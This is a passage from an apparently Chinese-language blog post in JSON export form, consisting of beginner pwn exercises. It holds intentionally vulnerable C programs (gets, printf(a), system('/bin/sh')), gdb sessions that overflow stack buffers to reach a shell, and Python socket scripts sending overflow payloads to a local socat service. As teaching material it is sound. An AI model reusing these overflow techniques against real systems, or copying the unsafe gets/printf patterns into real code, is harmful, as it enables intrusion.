ec 20             sub    rsp,0x20\n  4007c3:       64 48 8b 04 25 28 00    mov    rax,QWORD PTR fs:0x28\n  4007ca:       00 00\n  4007cc:       48 89 45 f8             mov    QWORD PTR [rbp-0x8],rax\n  4007d0:       31 c0                   xor    eax,eax\n  4007d2:       48 c7 45 e8 00 00 00    mov    QWORD PTR [rbp-0x18],0x0\n  4007d9:       00\n  4007da:       48 c7 45 f0 00 00 00    mov    QWORD PTR [rbp-0x10],0x0\n  4007e1:       00\n  4007e2:       48 8d 3d db 00 00 00    lea    rdi,[rip+0xdb]        # 4008c4 <_IO_stdin_used+0x4>\n  4007e9:       e8 02 fe ff ff          call   4005f0 <puts@plt>\n  4007ee:       48 8d 45 e8             lea    rax,[rbp-0x18]\n  4007f2:       48 89 c7                mov    rdi,rax\n  4007f5:       b8 00 00 00 00          mov    eax,0x0\n  4007fa:       e8 31 fe ff ff          call   400630 <gets@plt>\n  4007ff:       48 8d 45 e8             lea    rax,[rbp-0x18]\n  400803:       48 89 c7                mov    rdi,rax\n  400806:       b8 00 00 00 00          mov    eax,0x0\n  40080b:       e8 10 fe ff ff          call   400620 <printf@plt>\n  400810:       0f b6 45 f0             movzx  eax,BYTE PTR [rbp-0x10]\n  400814:       3c 61                   cmp    al,0x61\n  400816:       75 0c                   jne    400824 <main+0x69>\n  400818:       48 8d 3d 39 08 20 00    lea    rdi,[rip+0x200839]        # 601058 <sh>\n  40081f:       e8 78 ff ff ff          call   40079c <func>\n  400824:       b8 00 00 00 00          mov    eax,0x0\n  400829:       48 8b 55 f8             mov    rdx,QWORD PTR [rbp-0x8]\n  40082d:       64 48 33 14 25 28 00    xor    rdx,QWORD PTR fs:0x28\n  400834:       00 00\n  400836:       74 05                   je     40083d <main+0x82>\n  400838:       e8 c3 fd ff ff          call   400600 <__stack_chk_fail@plt>\n  40083d:       c9                      leave\n  40083e:       c3                      ret\n  40083f:       90                      nop<\/code><\/pre>\n
\"image-20220615005254023\"<\/div><\/p>\n
\u4f5c\u4e1a<\/h2>\n
hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_5$ ls\nquestion_2.c  question_2_x64\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_5$ cat question_2.c\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\nchar sh[]="\/bin\/sh";\n\nint init_func(){\n    setvbuf(stdin,0,2,0);\n    setvbuf(stdout,0,2,0);\n    setvbuf(stderr,0,2,0);\n    return 0;\n}\n\nint func(char *cmd){\n        system(cmd);\n        return 0;\n}\n\nint main(){\n    init_func();\n    char a[8] = {};\n    char b[8] = {};\n        puts("input:");\n        gets(a);\n        printf(a);\n        if(!strcmp(b,"deadbeef")){\n                func(sh);\n        }\n    return 0;\n}\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_5$ .\/question_2_x64\ninput:\naaaaaaaadeadbeef\naaaaaaaadeadbeef$ whoami\nhack\n$ exit<\/code><\/pre>\n
hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_5$ gdb .\/question_2_x64\nGNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1\nCopyright (C) 2018 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later <http:\/\/gnu.org\/licenses\/gpl.html>\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.  Type "show copying"\nand "show warranty" for details.\nThis GDB was configured as "x86_64-linux-gnu".\nType "show configuration" for configuration details.\nFor bug reporting instructions, please see:\n<http:\/\/www.gnu.org\/software\/gdb\/bugs\/>.\nFind the GDB manual and other documentation resources online at:\n<http:\/\/www.gnu.org\/software\/gdb\/documentation\/>.\nFor help, type "help".\nType "apropos word" to search for commands related to "word"...\nReading symbols from .\/question_2_x64...(no debugging symbols found)...done.\n\n(gdb) start\nTemporary breakpoint 3 at 0x555555555295\nStarting program: \/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_5\/question_2_x64\n\nTemporary breakpoint 3, 0x0000555555555295 in main ()\n(gdb) disassemble $rip\nDump of assembler code for function main:\n=> 0x0000555555555295 <+0>:     endbr64\n   0x0000555555555299 <+4>:     push   rbp\n   0x000055555555529a <+5>:     mov    rbp,rsp\n   0x000055555555529d <+8>:     sub    rsp,0x20\n   0x00005555555552a1 <+12>:    mov    rax,QWORD PTR fs:0x28\n   0x00005555555552aa <+21>:    mov    QWORD PTR [rbp-0x8],rax\n   0x00005555555552ae <+25>:    xor    eax,eax\n   0x00005555555552b0 <+27>:    mov    eax,0x0\n   0x00005555555552b5 <+32>:    call   0x555555555209 <init_func>\n   0x00005555555552ba <+37>:    mov    QWORD PTR [rbp-0x18],0x0\n   0x00005555555552c2 <+45>:    mov    QWORD PTR [rbp-0x10],0x0\n   0x00005555555552ca <+53>:    lea    rdi,[rip+0xd33]        # 0x555555556004\n   0x00005555555552d1 <+60>:    call   0x5555555550b0 <puts@plt>\n   0x00005555555552d6 <+65>:    lea    rax,[rbp-0x18]\n   0x00005555555552da <+69>:    mov    rdi,rax\n   0x00005555555552dd <+72>:    mov    eax,0x0\n   0x00005555555552e2 <+77>:    call   0x555555555100 <gets@plt>\n   0x00005555555552e7 <+82>:    lea    rax,[rbp-0x18]\n   0x00005555555552eb <+86>:    mov    rdi,rax\n   0x00005555555552ee <+89>:    mov    eax,0x0\n   0x00005555555552f3 <+94>:    call   0x5555555550e0 <printf@plt>\n   0x00005555555552f8 <+99>:    lea    rax,[rbp-0x10]\n   0x00005555555552fc <+103>:   lea    rsi,[rip+0xd08]        # 0x55555555600b\n   0x0000555555555303 <+110>:   mov    rdi,rax\n   0x0000555555555306 <+113>:   call   0x5555555550f0 <strcmp@plt>\n   0x000055555555530b <+118>:   test   eax,eax\n   0x000055555555530d <+120>:   jne    0x55555555531b <main+134>\n   0x000055555555530f <+122>:   lea    rdi,[rip+0x2cfa]        # 0x555555558010 <sh>\n---Type <return> to continue, or q <return> to quit---\n   0x0000555555555316 <+129>:   call   0x555555555272 <func>\n   0x000055555555531b <+134>:   mov    eax,0x0\n   0x0000555555555320 <+139>:   mov    rdx,QWORD PTR [rbp-0x8]\n   0x0000555555555324 <+143>:   xor    rdx,QWORD PTR fs:0x28\n   0x000055555555532d <+152>:   je     0x555555555334 <main+159>\n   0x000055555555532f <+154>:   call   0x5555555550c0 <__stack_chk_fail@plt>\n   0x0000555555555334 <+159>:   leave\n   0x0000555555555335 <+160>:   ret\nEnd of assembler dump.\n(gdb) b *0x000055555555530b\nBreakpoint 4 at 0x55555555530b\n(gdb) c\nContinuing.\ninput:\naaaaaaa\naaaaaaa\nBreakpoint 4, 0x000055555555530b in main ()\n(gdb) x\/10i $rip\n=> 0x55555555530b <main+118>:   test   eax,eax\n   0x55555555530d <main+120>:   jne    0x55555555531b <main+134>\n   0x55555555530f <main+122>:   lea    rdi,[rip+0x2cfa]        # 0x555555558010 <sh>\n   0x555555555316 <main+129>:   call   0x555555555272 <func>\n   0x55555555531b <main+134>:   mov    eax,0x0\n   0x555555555320 <main+139>:   mov    rdx,QWORD PTR [rbp-0x8]\n   0x555555555324 <main+143>:   xor    rdx,QWORD PTR fs:0x28\n   0x55555555532d <main+152>:   je     0x555555555334 <main+159>\n   0x55555555532f <main+154>:   call   0x5555555550c0 <__stack_chk_fail@plt>\n   0x555555555334 <main+159>:   leave\n(gdb) i r\nrax            0xffffff9c       4294967196\nrbx            0x0      0\nrcx            0x0      0\nrdx            0x64     100\nrsi            0x55555555600b   93824992239627\nrdi            0x7fffffffdb90   140737488346000\nrbp            0x7fffffffdba0   0x7fffffffdba0\nrsp            0x7fffffffdb80   0x7fffffffdb80\nr8             0x7      7\nr9             0x7ffff7fe94c0   140737354044608\nr10            0x2      2\nr11            0x246    582\nr12            0x555555555120   93824992235808\nr13            0x7fffffffdc80   140737488346240\nr14            0x0      0\nr15            0x0      0\nrip            0x55555555530b   0x55555555530b <main+118>\neflags         0x297    [ CF PF AF SF IF ]\ncs             0x33     51\nss             0x2b     43\nds             0x0      0\nes             0x0      0\nfs             0x0      0\ngs             0x0      0\n(gdb) set $eax=0x00\n(gdb) i r\nrax            0x0      0\nrbx            0x0      0\nrcx            0x0      0\nrdx            0x64     100\nrsi            0x55555555600b   93824992239627\nrdi            0x7fffffffdb90   140737488346000\nrbp            0x7fffffffdba0   0x7fffffffdba0\nrsp            0x7fffffffdb80   0x7fffffffdb80\nr8             0x7      7\nr9             0x7ffff7fe94c0   140737354044608\nr10            0x2      2\nr11            0x246    582\nr12            0x555555555120   93824992235808\nr13            0x7fffffffdc80   140737488346240\nr14            0x0      0\nr15            0x0      0\nrip            0x55555555530b   0x55555555530b <main+118>\neflags         0x297    [ CF PF AF SF IF ]\ncs             0x33     51\nss             0x2b     43\nds             0x0      0\nes             0x0      0\nfs             0x0      0\ngs             0x0      0\n(gdb) ni\n0x000055555555530d in main ()\n(gdb) x\/10i $rip\n=> 0x55555555530d <main+120>:   jne    0x55555555531b <main+134>\n   0x55555555530f <main+122>:   lea    rdi,[rip+0x2cfa]        # 0x555555558010 <sh>\n   0x555555555316 <main+129>:   call   0x555555555272 <func>\n   0x55555555531b <main+134>:   mov    eax,0x0\n   0x555555555320 <main+139>:   mov    rdx,QWORD PTR [rbp-0x8]\n   0x555555555324 <main+143>:   xor    rdx,QWORD PTR fs:0x28\n   0x55555555532d <main+152>:   je     0x555555555334 <main+159>\n   0x55555555532f <main+154>:   call   0x5555555550c0 <__stack_chk_fail@plt>\n   0x555555555334 <main+159>:   leave\n   0x555555555335 <main+160>:   ret\n(gdb) ni\n0x000055555555530f in main ()\n(gdb) x\/10i $rip\n=> 0x55555555530f <main+122>:   lea    rdi,[rip+0x2cfa]        # 0x555555558010 <sh>\n   0x555555555316 <main+129>:   call   0x555555555272 <func>\n   0x55555555531b <main+134>:   mov    eax,0x0\n   0x555555555320 <main+139>:   mov    rdx,QWORD PTR [rbp-0x8]\n   0x555555555324 <main+143>:   xor    rdx,QWORD PTR fs:0x28\n   0x55555555532d <main+152>:   je     0x555555555334 <main+159>\n   0x55555555532f <main+154>:   call   0x5555555550c0 <__stack_chk_fail@plt>\n   0x555555555334 <main+159>:   leave\n   0x555555555335 <main+160>:   ret\n   0x555555555336:      nop    WORD PTR cs:[rax+rax*1+0x0]\n(gdb) n\nSingle stepping until exit from function main,\nwhich has no line number information.\n$ whoami\nhack<\/code><\/pre>\n
python\u811a\u672cpwn<\/h1>\n
\u57fa\u7840\u5185\u5bb9<\/h2>\n
shell\u65e0\u6cd5\u6253\u4e0d\u53ef\u89c1\u5b57\u7b26\uff0c\u53ea\u80fd\u4f7f\u7528\u811a\u672c\u8fdb\u884cpwn\uff0c\u76ee\u524d\u5e38\u89c1\u7684pwn\u6846\u67b6\u662fpwntools\uff0c\u8fd9\u91cc\u4ee5\u4e00\u4e2apython2\u811a\u672c\u8fdb\u884c\u89e3\u91ca\uff1a<\/p>\n
hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_5$ cd ..\/test_6\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_6$ ls\nquestion_1_plus.c  question_1_plus_py2.py  question_1_plus_x64\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_6$ cat question_1_plus.c\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\nchar sh[]="\/bin\/sh";\nint init_func(){\n    setvbuf(stdin,0,2,0);\n    setvbuf(stdout,0,2,0);\n    setvbuf(stderr,0,2,0);\n    return 0;\n}\n\nint func(char *cmd){\n        system(cmd);\n        return 0;\n}\n\nint main(){\n    char a[8] = {};\n    char b[8] = {};\n    \/\/char a[1] = {'b'};\n        puts("input:");\n        gets(a);\n        printf(a);\n        if(b[0]==0x10){\n                func(sh);\n        }\n    return 0;\n}<\/code><\/pre>\n
hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_6$ .\/question_1_plus_x64\ninput:\naaaaaaaa\\x10\naaaaaaaa\\x10hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_6$ cat question_1_plus_py2.py\nimport socket\nimport telnetlib\nimport struct\n\ndef P32(val):\n        return struct.pack("", val)\n\ndef pwn():\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        s.connect(("127.0.0.1", 8888))\n        payload = 'A'*0x8 + '\\x10'\n        s.sendall(payload + '\\n')\n        t = telnetlib.Telnet()\n        t.sock = s\n        t.interact()\n\nif __name__ == "__main__":\n    # socat tcp-l:8888,fork exec:.\/question_1_plus_x64,reuseaddr\n        pwn()<\/code><\/pre>\n
hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_6$ nc 127.0.0.1 8888\naaaaaaaadeadbeef\ninput:\naaaaaaaadeadbeef\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_6$ nc 127.0.0.1 8888\naaaaaaaaaa\ninput:\naaaaaaaaaa<\/code><\/pre>\n
\u4f5c\u4e1a<\/h2>\n
hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_7$ gcc -no-pie question_3.c\nquestion_3.c: In function \u2018main\u2019:\nquestion_3.c:26:2: warning: implicit declaration of function \u2018gets\u2019; did you mean \u2018fgets\u2019? [-Wimplicit-function-declaration]\n  gets(&a);\n  ^~~~\n  fgets\n\/tmp\/cc9KypAt.o: In function `main':\nquestion_3.c:(.text+0xc6): warning: the `gets' function is dangerous and should not be used.\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_7$ ls\na.out  question_3.c  question_3_x64\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_7$ gdb .\/a.out\nGNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1\nCopyright (C) 2018 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later <http:\/\/gnu.org\/licenses\/gpl.html>\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.  Type "show copying"\nand "show warranty" for details.\nThis GDB was configured as "x86_64-linux-gnu".\nType "show configuration" for configuration details.\nFor bug reporting instructions, please see:\n<http:\/\/www.gnu.org\/software\/gdb\/bugs\/>.\nFind the GDB manual and other documentation resources online at:\n<http:\/\/www.gnu.org\/software\/gdb\/documentation\/>.\nFor help, type "help".\nType "apropos word" to search for commands related to "word"...\nReading symbols from .\/a.out...(no debugging symbols found)...done.\n(gdb) start\nTemporary breakpoint 1 at 0x40076f\nStarting program: \/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_7\/a.out\n\nTemporary breakpoint 1, 0x000000000040076f in main ()\n(gdb) disassemble main\nDump of assembler code for function main:\n   0x000000000040076b <+0>:     push   rbp\n   0x000000000040076c <+1>:     mov    rbp,rsp\n=> 0x000000000040076f <+4>:     sub    rsp,0x20\n   0x0000000000400773 <+8>:     mov    rax,QWORD PTR fs:0x28\n   0x000000000040077c <+17>:    mov    QWORD PTR [rbp-0x8],rax\n   0x0000000000400780 <+21>:    xor    eax,eax\n   0x0000000000400782 <+23>:    mov    eax,0x0\n   0x0000000000400787 <+28>:    call   0x4006e7 <init_func>\n   0x000000000040078c <+33>:    mov    QWORD PTR [rbp-0x10],0x0\n   0x0000000000400794 <+41>:    lea    rdi,[rip+0xc9]        # 0x400864\n   0x000000000040079b <+48>:    call   0x4005b0 <puts@plt>\n   0x00000000004007a0 <+53>:    lea    rax,[rbp-0x14]\n   0x00000000004007a4 <+57>:    mov    rdi,rax\n   0x00000000004007a7 <+60>:    mov    eax,0x0\n   0x00000000004007ac <+65>:    call   0x4005e0 <gets@plt>\n   0x00000000004007b1 <+70>:    cmp    QWORD PTR [rbp-0x10],0x0\n   0x00000000004007b6 <+75>:    je     0x4007c3 <main+88>\n   0x00000000004007b8 <+77>:    mov    rdx,QWORD PTR [rbp-0x10]\n   0x00000000004007bc <+81>:    mov    eax,0x0\n   0x00000000004007c1 <+86>:    call   rdx\n   0x00000000004007c3 <+88>:    mov    eax,0x0\n   0x00000000004007c8 <+93>:    mov    rcx,QWORD PTR [rbp-0x8]\n   0x00000000004007cc <+97>:    xor    rcx,QWORD PTR fs:0x28\n   0x00000000004007d5 <+106>:   je     0x4007dc <main+113>\n   0x00000000004007d7 <+108>:   call   0x4005c0 <__stack_chk_fail@plt>\n   0x00000000004007dc <+113>:   leave\n   0x00000000004007dd <+114>:   ret\nEnd of assembler dump.\n(gdb) b *0x00000000004007b8\nBreakpoint 2 at 0x4007b8\n(gdb) c\nContinuing.\ninput:\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n\nBreakpoint 2, 0x00000000004007b8 in main ()\n(gdb) x\/10i $rip\n=> 0x4007b8 <main+77>:  mov    rdx,QWORD PTR [rbp-0x10]\n   0x4007bc <main+81>:  mov    eax,0x0\n   0x4007c1 <main+86>:  call   rdx\n   0x4007c3 <main+88>:  mov    eax,0x0\n   0x4007c8 <main+93>:  mov    rcx,QWORD PTR [rbp-0x8]\n   0x4007cc <main+97>:  xor    rcx,QWORD PTR fs:0x28\n   0x4007d5 <main+106>: je     0x4007dc <main+113>\n   0x4007d7 <main+108>: call   0x4005c0 <__stack_chk_fail@plt>\n   0x4007dc <main+113>: leave\n   0x4007dd <main+114>: ret\n(gdb) x\/20g $rbp-0x10\n0x7fffffffdba0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbb0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbc0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbd0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbe0: 0x6161616161616161      0x77c3006161616161\n0x7fffffffdbf0: 0x0000000000400600      0x00007fffffffdc90\n0x7fffffffdc00: 0x0000000000000000      0x0000000000000000\n0x7fffffffdc10: 0x883cca95299ca51c      0x883cda2ae662a51c\n0x7fffffffdc20: 0x00007fff00000000      0x0000000000000000\n0x7fffffffdc30: 0x0000000000000000      0x00007ffff7de38d3\n(gdb) p &func\n$1 = (<text variable, no debug info> *) 0x40074c <func>\n(gdb) set *0x7fffffffdba0=0x40074c\n(gdb) x\/20g $rbp-0x10\n0x7fffffffdba0: 0x616161610040074c      0x6161616161616161\n0x7fffffffdbb0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbc0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbd0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbe0: 0x6161616161616161      0x77c3006161616161\n0x7fffffffdbf0: 0x0000000000400600      0x00007fffffffdc90\n0x7fffffffdc00: 0x0000000000000000      0x0000000000000000\n0x7fffffffdc10: 0x883cca95299ca51c      0x883cda2ae662a51c\n0x7fffffffdc20: 0x00007fff00000000      0x0000000000000000\n0x7fffffffdc30: 0x0000000000000000      0x00007ffff7de38d3\n(gdb) set *0x7fffffffdba4=0\n(gdb) x\/20g $rbp-0x10\n0x7fffffffdba0: 0x000000000040074c      0x6161616161616161\n0x7fffffffdbb0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbc0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbd0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbe0: 0x6161616161616161      0x77c3006161616161\n0x7fffffffdbf0: 0x0000000000400600      0x00007fffffffdc90\n0x7fffffffdc00: 0x0000000000000000      0x0000000000000000\n0x7fffffffdc10: 0x883cca95299ca51c      0x883cda2ae662a51c\n0x7fffffffdc20: 0x00007fff00000000      0x0000000000000000\n0x7fffffffdc30: 0x0000000000000000      0x00007ffff7de38d3\n(gdb) x\/10i $rip\n=> 0x4007b8 <main+77>:  mov    rdx,QWORD PTR [rbp-0x10]\n   0x4007bc <main+81>:  mov    eax,0x0\n   0x4007c1 <main+86>:  call   rdx\n   0x4007c3 <main+88>:  mov    eax,0x0\n   0x4007c8 <main+93>:  mov    rcx,QWORD PTR [rbp-0x8]\n   0x4007cc <main+97>:  xor    rcx,QWORD PTR fs:0x28\n   0x4007d5 <main+106>: je     0x4007dc <main+113>\n   0x4007d7 <main+108>: call   0x4005c0 <__stack_chk_fail@plt>\n   0x4007dc <main+113>: leave\n   0x4007dd <main+114>: ret\n(gdb) n\nSingle stepping until exit from function main,\nwhich has no line number information.\n$ whoami\nhack<\/code><\/pre>\n
import socket\nimport telnetlib\nimport struct\n\ndef P32(val):\n        return struct.pack("", val)\n\ndef pwn():\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        s.connect(("127.0.0.1", 8888))\n        payload = 'A'*4 + '\\x1f\\x12\\x40\\x00\\x00\\x00\\x00\\x00'  #\u6ce8\u610f\u7aef\u5e8f\n        s.sendall(payload + '\\n')\n        t = telnetlib.Telnet()\n        t.sock = s\n        t.interact()\n\nif __name__ == "__main__":\n    # socat tcp-l:8888,fork exec:.\/question_1_plus_x64,reuseaddr\n        pwn()<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
gcc -o gcc -O1\/O2\/O3 -O\uff0c-O1\uff1a\u8fd9\u4e24\u4e2a\u547d\u4ee4\u7684\u6548\u679c\u662f\u4e00\u6837\u7684\uff0c\u76ee\u7684\u90fd\u662f\u5728\u4e0d\u5f71\u54cd\u7f16\u8bd1\u901f\u5ea6\u7684\u524d […]<\/p>\n","protected":false},"author":1,"featured_media":115,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,19],"tags":[],"class_list":["post-179","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf-and-protest","category-pwn"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/179","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=179"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/179\/revisions"}],"predecessor-version":[{"id":180,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/179\/revisions\/180"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media\/115"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=179"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=179"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=179"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}